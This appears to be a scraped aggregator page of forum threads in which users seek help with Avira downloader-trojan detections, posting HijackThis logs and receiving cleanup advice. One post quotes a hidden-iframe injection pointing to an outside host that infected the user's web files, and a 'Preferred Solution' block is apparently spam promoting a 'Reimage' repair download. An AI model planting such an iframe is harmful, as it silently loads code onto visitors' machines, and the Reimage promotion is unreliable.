Over 1 million tech questions and answers.

JS/Dldr.Iframe.BO

Q: JS/Dldr.Iframe.BO

I have just had 3 securtiy alert messages from AVIRA,don't know if it would have any connection :
C:\users\XXXX\AppData\Local\Microsoft\...\b(1).js contains suspiscious code HEUR/HTML. malware, the same version b(2)
and detection pattern of the java script virus JS/Dldr.Iframe.BO
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:04:02, on 22/06/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Windows Live\Family Safety\fssui.exe
C:\Program Files\TalkTalk\bin\sprtcmd.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Common Files\Nero\Lib\NMBgMonitor.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
C:\Windows\System32\rundll32.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopDisplay.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exe
C:\Program Files\Internet Explorer\IEUser.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLLoginProxy.exe
C:\Windows\system32\Macromed\Flash\FlashUtil9e.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.aol.co.uk/talktalk
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.aldi.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: Windows Live OneCare Family Safety Browser Helper - {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} - C:\Program Files\Windows Live\Family Safety\fssbho.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [Skytel] Skytel.exe
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [toolbar_eula_launcher] C:\Program Files\GoogleEULA\EULALauncher.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Easy-PrintToolBox] C:\Program Files\Canon\Easy-PrintToolBox\BJPSMAIN.EXE /logon
O4 - HKLM\..\Run: [fssui] "C:\Program Files\Windows Live\Family Safety\fssui.exe" -autorun
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [TalkTalk] "C:\Program Files\TalkTalk\bin\sprtcmd.exe" /P TalkTalk
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [COMODO Firewall Pro] "C:\Program Files\COMODO\Firewall\cfp.exe" -h
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Nero\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background (User 'Default user')
O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Blog This - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: &Blog This in Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O13 - Gopher Prefix:
O16 - DPF: {238F6F83-B8B4-11CF-8771-00A024541EE3} (Citrix ICA Client) - https://ebrdremote.ebrd.com/citrix/wfica.cab
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL C:\Windows\system32\guard32.dll
O23 - Service: Avira AntiVir Personal – Free Antivirus Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: Avira AntiVir Personal – Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: COMODO Firewall Pro Helper Service (cmdAgent) - Unknown owner - C:\Program Files\COMODO\Firewall\cmdagent.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: PIXMA Extended Survey Program (IJPLMSVC) - Unknown owner - C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE
O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared Files\RichVideo.exe
O23 - Service: SBSD Security Center Service (SBSDWSCService) - Safer Networking Ltd. - C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
O23 - Service: SupportSoft Sprocket Service (TalkTalk) (sprtsvc_TalkTalk) - SupportSoft, Inc. - C:\Program Files\TalkTalk\bin\sprtsvc.exe
O23 - Service: SupportSoft RemoteAssist - SupportSoft, Inc. - C:\Program Files\Common Files\Supportsoft\bin\ssrc.exe
O23 - Service: SupportSoft Repair Service (TalkTalk) (tgsrvc_TalkTalk) - SupportSoft, Inc. - C:\Program Files\Common Files\Supportsoft\bin\tgsrvc.exe
O23 - Service: X10 Device Network Service (x10nets) - X10 - C:\PROGRA~1\COMMON~1\X10\Common\x10nets.exe

--
End of file - 10402 bytes

RELEVANCY SCORE 200
Preferred Solution: JS/Dldr.Iframe.BO

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

A: JS/Dldr.Iframe.BO

Read other 6 answers
RELEVANCY SCORE 55.2

Hi Guys,

I have a problem with my computer.
looks i have a virus/malware inside my computer. I have to try to restore using system restore, seems i doesn't work.

This kind of <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> infected all of my HTML/PHP/ASPX files in my computer.
I had to try to delete it using notepad, but when i open it again. it still there.

Can sombody please help me, cause i still had a lot of work must be finished monday, and i can't continue to work if my computer still behave like this.

Here is log file using DDS i created to you guys. Thanks for your help

A:<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resul... Read more

Read other 2 answers
RELEVANCY SCORE 39.6

According to AntiVir I have this Trojan. It is very annoying as it closes the process of anything I try to do as far as removing it.

I am unable to run Hijackthis or Killbox without them closing within 2 seconds. I have ran a scan with Ewido and Antivir as well as Ad-aware and they all find things and have removed them.

Every time that I reboot my PC then a file "winit.exe" is detected as this trojan by Antivir and I can delete it, but then it will just come back the next reboot.

I've been working with Avira to try to clear this but so far have failed, is there anyone who can help me out?

Edit: I booted into safe mode and was able to get a Hijackthis log file... Here is the contents...
Logfile of HijackThis v1.99.1
Scan saved at 8:41:16 AM, on 5/7/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16414)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://g.msn.com/0SEENUS/SAOS01?FORM=TOOLBR
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://g.msn.com/0SEENUS/SAOS01?FORM=TOOLBR
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com... Read more

A:TR/Dldr.Agent.bls.6

Read other 7 answers
RELEVANCY SCORE 39.6

New virus. Ithought I fixed the previous one and now this is what comes up. I can't remove yahoos bundled antivirus and etc b/c its not my computer. Really need help with this. Thanks much! =)

Logfile of HijackThis v1.99.1
Scan saved at 2:13:46 PM, on 1/28/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\AntiVir PersonalEdition Classic\avguard.exe
C:\WINDOWS\System32\drivers\CDAC11BA.EXE
C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe
C:\Program Files\Yahoo!\Antivirus\ISafe.exe
C:\WINDOWS\System32\cisvc.exe
C:\Program Files\ewido anti-spyware 4.0\guard.exe
C:\Program Files\Spyware Doctor\sdhelp.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\wdfmgr.exe
C:\Program Files\Yahoo!\Antivirus\VetMsg.exe
C:\WINDOWS\wanmpsvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\cidaemon.exe
C:\PROGRA~1\SPYWAR~1\swdoctor.exe
C:\PROGRA~1\Yahoo!\browser\ycommon.exe
C:\Program Files\Yahoo!\browser\ybrwicon... Read more

A:TR/Dldr.iBill.C

Closing duplicate thread, please continue here: http://forums.techguy.org/security/538154-tr-dldr-age-66267-c.html
 

Read other 1 answers
RELEVANCY SCORE 39.6

the same as what I try I can not remove this

"" JS / Dldr.Agent.KO ""

I use avira anitvirus have tried with malware byte anti malware ccclener and fixwarout etc but without success there is no solution to the problem when I search in google, then hope someone here can help me with the problem! here is the problem every time I open the explorer or a document as PDF or like as it snaps up a warning pop up. I will soon be crazy if I do not get this out, even if I move it to quarantine or delete it does not help. it's like back next time I open the explorer .. sorry for my poor English, hope someone can help me, Thank you in advance
 

Read other answers
RELEVANCY SCORE 39.6

Hello everyone and thank you in advance for any help or suggestions you can provide me.

I have just recently, within the past 3 days, started getting warnings on my pc about a virus trying to enter or have entered. The notice gives me the option to deny access, delete, etc. I have read one of ur postings here about the same virus, with its instructions. But I am not a computer savy person and I am not sure if I can follow the exact same instructions. This warning notice comes up constantly and I'm not sure what I'm suppose to be doing.
Can someone please take me through baby steps on how to do this...

Donna

PS **** The title is incorrect the name of the virus is : TR/Dldr.conhook.Gen

Read other answers
RELEVANCY SCORE 39.6

Hi
Avira starting giving me a malware found message about "TR/Dldr.Lodomo.K" being found in a tmp file last night. After the message it follows up by saying that access to this file was denied. If I click remove it goes to scan and a brand new message about "TR/Dldr.Lodomo.K" found in a tmp file and that access is still denied shows up. The only way to not get a new alert is to ignore the current one. The tmp files keep on changing and on occiasion, just to freak me out, it has multiple programs found with access still being denied. Then joys of all joys AntiVir Guard now says service stopped.

My bell internet service found an instance, said it fixed the problem and cheerfully suggested I restart. Avira of course had more alerts to share with me afterwards.

Very calmly and eagerly awaiting advice ^^

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:00:52 PM, on 19/05/2010
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18882)
Boot mode: Normal

Running processes:
C:\Windows\Explorer.EXE
C:\Program Files\Bell\Bell Internet Security Services\rps.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\HP\QuickPlay\QPService.exe
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Hewlett-Packard\HP QuickTouch\HPKBDAPP.exe
C:\Pro... Read more

Read other answers
RELEVANCY SCORE 39.6

Im running AntiVir PE Classic and AVG Anti-Spyware. I have run Spybot and Ad-aware. About 3 times a day I get a pop-up saying I have tr/dldr.adroar. I have always hit deny access when prompted and I wanted to know if anyone can tell me exactly what this is and what should I do?

A:Tr/dldr.adroar What Is This?

The only reference in Googling is mention in AntiVir's list of known malware. Suggest you scan with the online scanner in the link below. Let us know what it finds if anything.http://www.bitdefender.com/scan8/ie.html

Read other 3 answers
RELEVANCY SCORE 39.6

Windows XP
Firefox

I picked up the TR/Dldr.WMA.Wimad.N virus. I have the antivir software which detects. I use the scan which deletes all the files but when I start my computer again I still seem to have the virus (i keep getting popups from my antivir telling me that they have detected new suspicious files)

I tried it in both safe mode and normal mode.

help me be free of this virus

A:Tr/dldr.wma.wimad.n

they have detected new suspicious filesthe files are usually wma or mp3 downloaded from limewire or other P2P programsyou can download them faster than your AV can find them

Read other 4 answers
RELEVANCY SCORE 39.6

OK so i have a Trojan that I'd like to get rid of.. i tried to do the 5 step process thing and i cannot do anything. Since this morning my javascript has been disabled, activex won't run and my security options keep changing. i tried to run panda active scan but somehow when i click the button its non-responsive., nothing comes up and i cant open it in another tab. i also tried to download spy ware blaster and it said that my security settings do no allow me to download that file. i can hardly do anything in IE so I'm using Firefox. please help i don't know what to do. as soon as this is fixed i hope i can move onto the Trojan

A:Spy-Agent.bf.dldr Cannot Get Rid Of

Hi and welcome to TSF.

If you can use Firefox then download the following file (and HijackThis if possible). If not, use another computer for the download and transfer the programme using a USB stick or similar.

If Combofix refuses to run, try renaming it to some made up name and then run it.


Download ComboFix and save it to your desktop.

**Note: It is important that it is saved directly to your desktop**

CAUTION! Combofix should not be run without supervision - we cannot be held responsible if you end up having to re-install Windows!

1. Close any open browsers and physically disconnect from the Internet.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
See here for a guide to disabling AV, Firewall and Anti-malware programmes.
Double click on combofix.exe & follow the prompts.
When finished, it will produce a report for you.
Please post the log C:\ComboFix.txt along with a fresh HijackThis Log for further review.

Do not mouseclick combofix's window whilst it's running. This may cause it to stall.

Read other 4 answers
RELEVANCY SCORE 39.6

Hello, I am having a bit of a problem getting rid of a Trojan. I've used Antivir, Kaspersky, spybot, adware, registry cleaner, cwshreddar, ccleaner, super anti spyware, tweaknow, xoftspy, ewido, and some others. There was alot more than just this trojan, but now I'm left with this. I know its location but it renews itself upon booting up. When I run the virus scan in safemode it doesnt detect it...so maybe something in startup? Heres my hijackthis log. Need help pretty bad on this one.
Thanks!

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Lexmark X6100 Series\lxbfbmgr.exe
C:\Program Files\Yahoo!\Antivirus\CAVTray.exe
C:\Program Files\Yahoo!\Antivirus\CAVRID.exe
C:\PROGRA~1\Yahoo!\YOP\yop.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Yahoo!\Yahoo! Music Jukebox\ymetray.exe
C:\Program Files\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\AntiVir PersonalEdition Classic\avguard.exe
C:\WINDO... Read more

A:TR/DLDR.AGE.66267.c

Read other 8 answers
RELEVANCY SCORE 39.6

AntiVir found something named TR/Dldr.ConHook.Gen on my system, but it couldn't remove it for some reason. I ran VundoFix and it didn't find anything. Can someone please take a look at my HjackThis log and let me know if I still have a problem, and if so how I can fix it? Much thanks in advance!

Logfile of HijackThis v1.99.1
Scan saved at 12:57:09 AM, on 8/20/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16512)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\WINDOWS\system32\CTsvcCDA.EXE
C:\Program Files\Intel\Intel Matrix Storage Manager\iaantmon.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe
C:\Program Files\Creative\SBAudigy2ZS\Surround Mixer\CTSysVol.exe
C:\Program Files\Creative\SBAudigy2ZS\DVDAudio\CTDVDDET.EXE
C:\... Read more

A:TR/Dldr.ConHook.Gen

Getting assistance in the Spybot Forum. Thanks for whoever looked at this and I apologize for the duplicate post.

Read other 2 answers
RELEVANCY SCORE 39.6

I've been infected with a trojan called TR/Dldr.Agent.CU my virus scanner only detects it but won't remove it. Please help me get rid of it.

Logfile of HijackThis v1.99.1
Scan saved at 7:23:33 PM, on 3/24/2003
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\AVPersonal\AVGUARD.EXE
C:\Program Files\AVPersonal\AVWUPSRV.EXE
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\WINDOWS\BCMSMMSG.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\Program Files\AVPersonal\AVSched32.EXE
C:\Program Files\Java\jre1.5.0_02\bin\jusched.exe
C:\Program Files\AVPersonal\AVGNT.EXE
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\OpenOffice.org 1.9.79\program\soffice.exe
C:\Program Files\OpenOffice.org 1.9.79\program\soffice.BIN
C:\WINDOWS\System32\wuauclt.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Real\RealOne Player\rphelperapp.exe
C:\Program Files\Real\RealOne Player\rphelperapp.exe
C:\Program Files\Real\RealOne Player\rphelperapp.exe
C:\Program Files\AVPersonal\AVWIN.EXE
C:\... Read more

A:TR/Dldr.Agent.CU HELP!

Read other 6 answers
RELEVANCY SCORE 39.6

Hi there

I just got a virus warning called TR/Dldr.Swizzor.BD.1 .. ..does somebody know what this is ? And how I can remove it ? I made a antivirus check and selected the delet button ...

Greetings Oceanstar
 

A:TR/Dldr.Swizzor.BD.1 ??

Me again ....
Perhaps somebody can see something looking through the hijack :

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\LEXPPS.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Programme\Analog Devices\SoundMAX\Smax4.exe
C:\Programme\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\Programme\Logitech\iTouch\iTouch.exe
C:\Programme\MUSICMATCH\MUSICMATCH Jukebox\mm_tray.exe
C:\Programme\Lexmark X74-X75\lxbbbmgr.exe
C:\Programme\Trojancheck 6\tcguard.exe
C:\Programme\QuickTime\qttask.exe
C:\Programme\MSN Apps\Updater\01.02.3000.1001\de-ch\msnappau.exe
C:\Programme\Gemeinsame Dateien\Real\Update_OB\realsched.exe
C:\Programme\AVPersonal\AVGNT.EXE
C:\Programme\MSN Messenger\msnmsgr.exe
C:\Programme\Logitech\Desktop Messenger\8876480\Program\BackWeb-8876480.exe
C:\Programme\Lexmark X74-X75\lxbbbmon.exe
C:\Programme\Webroot\Spy Sweeper\SpySweeper.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ypager.exe
C:\PROGRA~1\AIM95\aim.exe
C:\Programme\Ulead Systems\Ulead PhotoImpact 6\ABMTSR.EXE
C:\Programme\InterVideo\Common\Bin\WinCinemaMgr.exe
C:\PROGRA~1\INCRED~1\bin\ImApp.exe
C:\Programme\AVPersonal\AVGUARD.EXE
C:\Programme\AVPersonal\AVWUPSRV.EXE
